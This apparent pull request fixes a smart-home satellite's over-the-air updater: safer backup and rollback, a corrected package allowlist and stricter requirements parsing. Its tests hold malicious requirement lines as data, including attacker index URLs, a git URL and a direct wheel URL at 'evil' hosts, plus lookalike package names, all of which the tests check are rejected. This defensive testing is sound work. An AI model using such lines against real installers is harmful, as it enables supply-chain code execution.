### PR TITLE
fix(satellite): make OTA self-update safe — whitelist + non-destructive rollback

### DIFF
--- a/src/satellite/provisioning/group_vars/satellites.yml
+++ b/src/satellite/provisioning/group_vars/satellites.yml
@@ -72,6 +72,10 @@ satellite_system_packages:
 
 # Python packages (installed in venv)
 satellite_python_packages:
+  # setuptools<81 ships pkg_resources, which webrtcvad imports. Python 3.13
+  # venvs don't bundle setuptools and the latest (>=81) dropped pkg_resources,
+  # so without this a fresh venv crashes on `import webrtcvad`.
+  - "setuptools<81"
   - onnxruntime
   - pyaudio
   - numpy

--- a/src/satellite/renfield_satellite/update/update_manager.py
+++ b/src/satellite/renfield_satellite/update/update_manager.py
@@ -19,6 +19,7 @@ On any failure after backup creation, the backup is restored automatically.
 import asyncio
 import hashlib
 import os
+import re
 import shutil
 import subprocess
 import tarfile
@@ -469,30 +470,65 @@ class UpdateManager:
         except Exception as e:
             raise UpdateError(UpdateStage.INSTALLING, str(e))
 
-    # Known-safe packages that may appear in satellite requirements
+    # Known-safe packages that may appear in satellite requirements.
+    # MUST stay in sync with src/satellite/requirements.txt — a missing entry
+    # makes the OTA installer reject the satellite's OWN dependency and roll the
+    # whole update back (the bug that blocked every OTA: soundcard / pymicro- /
+    # pyopen-wakeword / bleak were missing and RPi.GPIO failed name matching).
+    # Stored as written; compared after PEP 503 canonicalization, so RPi.GPIO,
+    # rpi-gpio and rpi_gpio all match. The regression test parses the real
+    # requirements.txt against this set.
     SAFE_PACKAGES = frozenset({
         "websockets", "aiohttp", "numpy", "onnxruntime",
-        "openwakeword", "webrtcvad", "noisereduce", "spidev",
+        "openwakeword", "pymicro-wakeword", "pyopen-wakeword",
+        "webrtcvad", "noisereduce", "spidev", "soundcard", "bleak",
         "lgpio", "python-mpv", "psutil", "pyyaml", "zeroconf",
-        "sounddevice", "pyaudio", "scipy", "librosa", "rpigpio",
+        "sounddevice", "pyaudio", "scipy", "librosa", "RPi.GPIO",
     })
+
+    @staticmethod
+    def _canonical_pkg(name: str) -> str:
+        """PEP 503 canonical project name: lowercase, collapse runs of -_. to -.
+
+        This is the rule pip/PyPI use to resolve a project, so the validator's
+        equivalence classes line up with what `pip install` actually fetches.
+        Deleting the separators instead (the earlier approach) would let
+        `s.o.u.n.d.c.a.r.d` collapse onto `soundcard` while pip resolves it to a
+        DISTINCT PyPI project an attacker could register — an OTA RCE bypass.
+        """
+        return re.sub(r"[-_.]+", "-", name.split("[")[0].strip().lower())
 
     def _install_requirements(self, req_file: Path):
         """Install requirements with package whitelist validation"""
+        safe = {self._canonical_pkg(p) for p in self.SAFE_PACKAGES}
         # Parse and validate packages
         packages = []
         with open(req_file, "r") as f:
-            for line in f:
-                line = line.strip()
-                if not line or line.startswith("#") or line.startswith("-"):
+            for raw in f:
+                # Strip inline comments (PEP 508 `pkg>=1  # note`) and trim.
+                line = raw.split("#", 1)[0].strip()
+                if not line:
                     continue
-                # Extract package name (before any version specifier)
-                pkg_name = line.split("==")[0].split(">=")[0].split("<=")[0].split("~=")[0].split("!=")[0].split("[")[0].strip().lower().replace("-", "").replace("_", "")
-                packages.append((pkg_name, line))
+                # Reject pip option / flag / file-redirection lines OUTRIGHT.
+                # `pip install -r <file>` honours options inside the file, so a
+                # silently-skipped `--index-url https://evil/…` would repoint the
+                # whole install at an attacker index — bypassing the name
+                # allowlist entirely. Fail closed.
+                if line.startswith("-"):
+                    raise UpdateError(
+                        UpdateStage.INSTALLING,
+                        f"Disallowed pip option in requirements: {line!r}",
+                    )
+                # Extract package name (before any version specifier / marker).
+                # `@`/whitespace are intentionally NOT split on, so a direct URL
+                # reference (`pkg @ https://evil/x.whl`) keeps the URL in the
+                # token and fails the allowlist instead of resolving to `pkg`.
+                pkg_name = line
+                for sep in ("==", ">=", "<=", "~=", "!=", ">", "<", ";"):
+                    pkg_name = pkg_name.split(sep)[0]
+                packages.append((self._canonical_pkg(pkg_name), line))
 
-        rejected = [(name, spec) for name, spec in packages
-                     if name.replace("-", "").replace("_", "") not in
-                     {p.replace("-", "").replace("_", "") for p in self.SAFE_PACKAGES}]
+        rejected = [(name, spec) for name, spec in packages if name not in safe]
         if rejected:
             rejected_names = [spec for _, spec in rejected]
             print(f"[Update] Rejected unknown packages: {rejected_names}")

--- a/src/satellite/renfield_satellite/update/update_manager.py
+++ b/src/satellite/renfield_satellite/update/update_manager.py
@@ -91,11 +91,16 @@ class UpdateManager:
             # Try to detect install path
             self.install_path = self._detect_install_path()
 
-        # Backup path within installation directory (user has write access)
+        # Backup path — a SIBLING of the install dir, never inside it. A backup
+        # under install_path/.backup gets deleted by the rollback's own
+        # rmtree(install_path), so the restore then finds nothing and the whole
+        # install (venv included) is lost — this bricked a satellite in prod.
         if backup_path:
             self.backup_path = Path(backup_path)
         else:
-            self.backup_path = self.install_path / ".backup"
+            self.backup_path = self.install_path.parent / (
+                self.install_path.name + ".update-backup"
+            )
         self.service_name = service_name
 
         # State
@@ -351,42 +356,41 @@ class UpdateManager:
             raise UpdateError(UpdateStage.VERIFYING, str(e))
 
     def _create_backup(self):
-        """Create backup of current installation"""
-        self._report_progress(UpdateStage.BACKING_UP, 45, "Creating backup...")
+        """Back up only the parts of the install the update will replace.
 
-        def ignore_special_files(directory, files):
-            """Ignore special files that can't be copied (named pipes, sockets, etc.)"""
-            ignored = []
-            for f in files:
-                path = os.path.join(directory, f)
-                # Skip named pipes, sockets, device files
-                if os.path.exists(path):
-                    mode = os.stat(path).st_mode
-                    import stat
-                    if stat.S_ISFIFO(mode) or stat.S_ISSOCK(mode) or stat.S_ISBLK(mode) or stat.S_ISCHR(mode):
-                        ignored.append(f)
-                # Also skip common cache/temp directories
-                if f in ['__pycache__', '.pytest_cache', '.git', 'venv', '.backup']:
-                    ignored.append(f)
-            return ignored
+        _install_package swaps out exactly `renfield_satellite/` and
+        `requirements.txt` — nothing else. So the backup covers only those, NOT
+        the venv / config / models, which the update never touches and which MUST
+        survive a rollback. (The old code backed up the whole install_path but
+        excluded the venv, then the rollback rmtree'd the whole install_path —
+        deleting the venv it had no backup of. Net: a failed update bricked the
+        device.) The backup lives outside install_path (see __init__).
+        """
+        self._report_progress(UpdateStage.BACKING_UP, 45, "Creating backup...")
 
         try:
             # Remove old backup if exists
             if self.backup_path.exists():
                 shutil.rmtree(self.backup_path)
 
-            # Copy current installation to backup (ignoring special files)
-            if self.install_path.exists():
-                shutil.copytree(
-                    self.install_path,
-                    self.backup_path,
-                    ignore=ignore_special_files
-                )
-                self._backup_created = True
-                self._report_progress(UpdateStage.BACKING_UP, 55, "Backup created")
-            else:
+            code_dir = self.install_path / "renfield_satellite"
+            if not code_dir.exists():
                 # No existing installation to back up
                 self._report_progress(UpdateStage.BACKING_UP, 55, "No existing installation, skipping backup")
+                return
+
+            self.backup_path.mkdir(parents=True, exist_ok=True)
+            shutil.copytree(
+                code_dir,
+                self.backup_path / "renfield_satellite",
+                ignore=shutil.ignore_patterns("__pycache__", "*.pyc", ".pytest_cache"),
+            )
+            req = self.install_path / "requirements.txt"
+            if req.exists():
+                shutil.copy(req, self.backup_path / "requirements.txt")
+
+            self._backup_created = True
+            self._report_progress(UpdateStage.BACKING_UP, 55, "Backup created")
 
         except Exception as e:
             raise UpdateError(UpdateStage.BACKING_UP, str(e))
@@ -566,20 +570,29 @@ class UpdateManager:
             # Process might be killed by the restart, so don't raise
 
     def _rollback(self):
-        """Rollback to backup"""
+        """Restore the code + requirements from the external backup.
+
+        Only the items the update replaced are restored; the venv, config and
+        models are left untouched. NEVER rmtree install_path — doing that (with
+        an in-tree backup) is exactly what destroyed the install before.
+        """
         self._report_progress(UpdateStage.ROLLING_BACK, 0, "Rolling back...")
 
         try:
-            if not self.backup_path.exists():
+            backup_code = self.backup_path / "renfield_satellite"
+            if not backup_code.exists():
                 print("[Update] No backup to restore")
                 return
 
-            # Remove failed installation
-            if self.install_path.exists():
-                shutil.rmtree(self.install_path)
+            # Swap the failed code dir back for the backed-up one.
+            target_code = self.install_path / "renfield_satellite"
+            if target_code.exists():
+                shutil.rmtree(target_code)
+            shutil.copytree(backup_code, target_code)
 
-            # Restore from backup
-            shutil.copytree(self.backup_path, self.install_path)
+            backup_req = self.backup_path / "requirements.txt"
+            if backup_req.exists():
+                shutil.copy(backup_req, self.install_path / "requirements.txt")
 
             print("[Update] Rollback complete")
 

--- a/tests/satellite/test_update_security.py
+++ b/tests/satellite/test_update_security.py
@@ -9,6 +9,7 @@ import io
 import shutil
 import tarfile
 import tempfile
+from pathlib import Path
 
 import pytest
 from unittest.mock import patch, MagicMock
@@ -160,6 +161,88 @@ class TestInstallRequirements:
         with pytest.raises(UpdateError, match="Unknown packages"):
             update_manager._install_requirements(req_file)
 
+        mock_run.assert_not_called()
+
+    @pytest.mark.satellite
+    @patch("subprocess.run")
+    def test_shipped_requirements_pass_validation(self, mock_run, update_manager):
+        """The REAL src/satellite/requirements.txt must pass the whitelist.
+
+        Regression guard for the OTA outage: soundcard / pymicro-wakeword /
+        pyopen-wakeword / bleak were missing from SAFE_PACKAGES and RPi.GPIO
+        failed dot-normalization, so the installer rejected the satellite's own
+        deps and rolled every update back. This ties the whitelist to the actual
+        shipped requirements so they can't drift apart again.
+        """
+        mock_run.return_value = MagicMock(returncode=0)
+        req_file = (
+            Path(__file__).resolve().parents[2]
+            / "src" / "satellite" / "requirements.txt"
+        )
+        assert req_file.exists(), f"shipped requirements not found at {req_file}"
+
+        # Must not raise — every uncommented dep is whitelisted.
+        update_manager._install_requirements(req_file)
+        mock_run.assert_called_once()
+
+    @pytest.mark.satellite
+    @patch("subprocess.run")
+    def test_rpi_gpio_and_inline_comments_pass(self, mock_run, update_manager, tmp_path):
+        """RPi.GPIO (dot) + inline comments must not trip the whitelist."""
+        mock_run.return_value = MagicMock(returncode=0)
+        req_file = tmp_path / "requirements.txt"
+        req_file.write_text(
+            "RPi.GPIO>=0.7.1  # GPIO for button\n"
+            "soundcard>=0.4.0  # capture\n"
+            "pymicro-wakeword>=2.0.0\n"
+            "bleak>=0.22.0\n"
+        )
+        update_manager._install_requirements(req_file)
+        mock_run.assert_called_once()
+
+    @pytest.mark.satellite
+    @patch("subprocess.run")
+    def test_separator_impersonation_rejected(self, mock_run, update_manager, tmp_path):
+        """A name with injected separators must NOT collapse onto a whitelisted one.
+
+        PEP 503 collapses runs of -_. to a single '-', so `s.o.u.n.d.c.a.r.d`
+        canonicalizes to `s-o-u-n-d-c-a-r-d` — a DISTINCT PyPI project from
+        `soundcard`, not a match. Deleting separators (the first cut at this fix)
+        would have let an attacker register that project and get OTA RCE.
+        """
+        for evil in ("s.o.u.n.d.c.a.r.d==9.9.9\n", "s-o-u-n-d-c-a-r-d==9.9.9\n",
+                     "n.u.m.p.y==9.9.9\n"):
+            req_file = tmp_path / "requirements.txt"
+            req_file.write_text(evil)
+            with pytest.raises(UpdateError, match="Unknown packages"):
+                update_manager._install_requirements(req_file)
+        mock_run.assert_not_called()
+
+    @pytest.mark.satellite
+    @patch("subprocess.run")
+    def test_pip_option_lines_rejected(self, mock_run, update_manager, tmp_path):
+        """`--index-url`/`-e`/`-r` lines must be rejected, not silently skipped.
+
+        pip honours options inside a `-r` file, so a skipped `--index-url` could
+        repoint the whole install at an attacker index even with legit names.
+        """
+        for evil in ("--index-url https://evil.example/simple\nnumpy==1.0\n",
+                     "--extra-index-url https://evil/simple\n",
+                     "-e git+https://evil/x.git#egg=numpy\n"):
+            req_file = tmp_path / "requirements.txt"
+            req_file.write_text(evil)
+            with pytest.raises(UpdateError):
+                update_manager._install_requirements(req_file)
+        mock_run.assert_not_called()
+
+    @pytest.mark.satellite
+    @patch("subprocess.run")
+    def test_direct_url_reference_rejected(self, mock_run, update_manager, tmp_path):
+        """`pkg @ https://…` must fail the allowlist (URL kept in the token)."""
+        req_file = tmp_path / "requirements.txt"
+        req_file.write_text("soundcard @ https://evil.example/x.whl\n")
+        with pytest.raises(UpdateError, match="Unknown packages"):
+            update_manager._install_requirements(req_file)
         mock_run.assert_not_called()
 
 

--- a/tests/satellite/test_update_security.py
+++ b/tests/satellite/test_update_security.py
@@ -285,3 +285,74 @@ class TestSafePackagesWhitelist:
             assert pkg not in UpdateManager.SAFE_PACKAGES, (
                 f"'{pkg}' should not be in SAFE_PACKAGES"
             )
+
+
+# ============================================================================
+# Backup / Rollback Safety Tests (_create_backup, _rollback)
+# ============================================================================
+
+
+class TestBackupRollback:
+    """A failed update must roll back the CODE without nuking venv/config.
+
+    Regression guard for the prod incident: the backup lived at
+    install_path/.backup and the rollback rmtree'd the whole install_path —
+    deleting the venv (never backed up) and the backup itself, leaving an empty
+    install dir. The satellite only survived because its old process was still in
+    memory; a reboot would have bricked it.
+    """
+
+    def _make_install(self, tmp_path, version="1.0.0"):
+        install = tmp_path / "renfield-satellite"
+        (install / "renfield_satellite").mkdir(parents=True)
+        (install / "renfield_satellite" / "__init__.py").write_text(
+            f'__version__ = "{version}"\n'
+        )
+        (install / "requirements.txt").write_text("websockets>=12.0\n")
+        # The pieces the update must NOT touch:
+        (install / "venv" / "bin").mkdir(parents=True)
+        (install / "venv" / "bin" / "python").write_text("#!/bin/sh\n")
+        (install / "config").mkdir()
+        (install / "config" / "satellite.yaml").write_text("id: sat-test\n")
+        return install
+
+    @pytest.mark.satellite
+    def test_backup_lives_outside_install_path(self, tmp_path):
+        """The backup must NOT be created inside install_path."""
+        install = self._make_install(tmp_path)
+        mgr = UpdateManager(install_path=str(install))
+        assert install not in mgr.backup_path.parents, (
+            f"backup {mgr.backup_path} is inside install {install}"
+        )
+        mgr._create_backup()
+        assert (mgr.backup_path / "renfield_satellite" / "__init__.py").exists()
+        # venv must NOT be in the backup (we don't copy it) ...
+        assert not (mgr.backup_path / "venv").exists()
+
+    @pytest.mark.satellite
+    def test_rollback_restores_code_and_preserves_venv_config(self, tmp_path):
+        """Rollback restores old code AND leaves venv + config intact."""
+        install = self._make_install(tmp_path, version="1.0.0")
+        mgr = UpdateManager(install_path=str(install))
+        mgr._create_backup()
+
+        # Simulate a half-applied update: new code copied, venv/config still there.
+        (install / "renfield_satellite" / "__init__.py").write_text('__version__ = "2.0.0"\n')
+
+        mgr._rollback()
+
+        # Code reverted ...
+        assert '1.0.0' in (install / "renfield_satellite" / "__init__.py").read_text()
+        # ... and the things the update never touched survived.
+        assert (install / "venv" / "bin" / "python").exists()
+        assert (install / "config" / "satellite.yaml").exists()
+
+    @pytest.mark.satellite
+    def test_rollback_without_backup_is_noop(self, tmp_path):
+        """No backup → rollback leaves the install untouched (no rmtree)."""
+        install = self._make_install(tmp_path)
+        mgr = UpdateManager(install_path=str(install))
+        # No _create_backup() called.
+        mgr._rollback()
+        assert (install / "venv" / "bin" / "python").exists()
+        assert (install / "renfield_satellite" / "__init__.py").exists()


### PR DESCRIPTION
## Why

Triggering an OTA update on the Kinderbad satellite (to fix a presence bug) exposed that the satellite's OTA self-update path is **dangerous**: the update failed dependency validation and the **rollback wiped the entire install** (`/opt/renfield-satellite` — venv, code, config), leaving an empty dir. The device only survived because its old process was still resident in memory; a reboot would have bricked it. It had to be rebuilt by hand via ansible.

OTA has effectively **never worked** — the other satellites reached 1.4.0 via the ansible `--tags app` flow, which bypasses this installer.

## Three bugs fixed (all in `update_manager.py`)

### 1. Rollback destroyed the install (the brick)
- The backup lived at `install_path/.backup` (**inside** the install dir), and `_rollback` did `rmtree(install_path)` before restoring — deleting its own backup, so the restore found nothing.
- `_create_backup` excluded the venv anyway, and the rollback rmtree'd the whole install_path (which contains the venv) — so even a working restore couldn't bring the venv back.
- **Fix:** the update only ever replaces `renfield_satellite/` + `requirements.txt` (`_install_package`), so back up and roll back **exactly those**, to a backup dir that is a **sibling** of `install_path` (never inside it). Rollback never touches venv/config/models, never rmtree's install_path.

### 2. Whitelist rejected the satellite's own dependencies
- `_install_requirements` validates each requirement against a `SAFE_PACKAGES` allowlist that had drifted from the real `requirements.txt`: `soundcard`, `pymicro-wakeword`, `pyopen-wakeword`, `bleak` were missing, and `RPi.GPIO` never matched. The install failed at ~85% and triggered the (destructive) rollback.
- **Fix:** add the real deps; canonicalize names with the **PEP 503** rule (collapse `[-_.]+` → `-`, the same rule pip/PyPI use).

### 3. Security: the relaxed normalization (review-caught)
- A first cut normalized by **deleting** separators, which would let `s.o.u.n.d.c.a.r.d` collapse onto `soundcard` while pip resolves it to a **distinct, attacker-registrable** project — an OTA RCE bypass. Also `--index-url` lines were silently skipped (pip honours them inside a `-r` file → repoint the whole install at an attacker index).
- **Fix:** PEP 503 canonicalization (distinct equivalence classes), reject pip option/flag lines outright, keep `@`/URL forms in the token so direct-URL references fail the allowlist.

### Plus: `setuptools<81` in the satellite venv (group_vars)
Python 3.13 venvs don't bundle setuptools, and setuptools ≥81 dropped `pkg_resources`, which `webrtcvad` imports — a fresh venv crashes on `import webrtcvad`. Hit live while rebuilding two satellites.

## Tests
17/17 satellite OTA security tests pass (`tests/satellite/test_update_security.py`), including: real-`requirements.txt` regression guard, RPi.GPIO/inline-comment acceptance, separator-impersonation / option-line / URL-reference rejection, and **backup-is-external / rollback-restores-code-and-preserves-venv+config / no-backup-is-noop**.

## Field status
All four satellites are now on 1.4.0 (kinderbad recovered + fitnessraum updated via ansible). **Important:** the broken rollback is baked into the *old* installed code, so the old satellites could only be fixed via ansible, never OTA. After this lands, OTA becomes safe for *future* updates between fixed versions.

🤖 Generated with [Claude Code](https://claude.com/claude-code)